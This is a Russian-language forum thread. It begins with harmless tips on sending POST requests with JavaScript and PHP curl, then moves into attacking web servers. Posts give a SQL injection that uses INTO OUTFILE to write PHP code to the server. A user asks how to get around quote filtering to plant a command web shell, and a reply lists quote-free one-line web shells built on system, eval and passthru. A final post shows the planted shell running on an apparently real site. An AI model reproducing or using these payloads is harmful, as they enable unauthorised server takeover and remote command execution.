Можно отправить с помощью javascript. Code: <form action="/script.php" method="post"> <input type="text" name="param" value="lol"> </form> <script language="javascript"> document.forms[0].submit(); </script> Или из строки браузера Code: javascript:document.forms[номер формы].submit();
и там нету ничего, что мне нужно. те ф-ции я знаю. есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
как вариант PHP: <?php $ci = curl_init(); // открываешь соединение curl_setopt($ci, CURLOPT_URL, "http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь curl_setopt($ci, CURLOPT_POST, true); // выбираешь пост запрос curl_setopt($ci, CURLOPT_POSTFIELDS, "параметр1=значение&параметр2=значение"); // перечесляешь запросы curl_exec($ci); // выполняешь запрос, и получешь ответ curl_close($ci); // закрываешь соединение ?>
to Qwazar Code: SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>' Круто, не знал, не видел никогда. блин круто. to vorona А еще можно на JS с помощью AJAX обращаться к скрипту пост запросом
Синий фломастер пишет белым.... зы: Мне тоже такие бестолковые посты начинать писать??? Когда же гугл станет домашней страницей ворон...и других?
Добрый день! Подскажите пожалуйста не могу записать в файл на сервере код CMD <?php system($_GET["cmd"]); ?> сервер походу фильтрует кавычки. Подскажите как это обойти, чтобы получить шелл. Или это невозможно?
печальный вопрос Code: <?system($_GET[cmd])?> <?eval($_GET[cmd])?> <?passthru($_GET[cmd])?> <?eval($_REQUEST[cmd])?> <?passthru($_REQUEST[cmd])?> <?system($_REQUEST[cmd])?> и да, мне интересно через что ты заливаешь шелл? если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
Warning: Wrong parameter count for system() in /home/site-shop.com/site/site/shell.php on line 1 При выполнении шелла такая ошибка.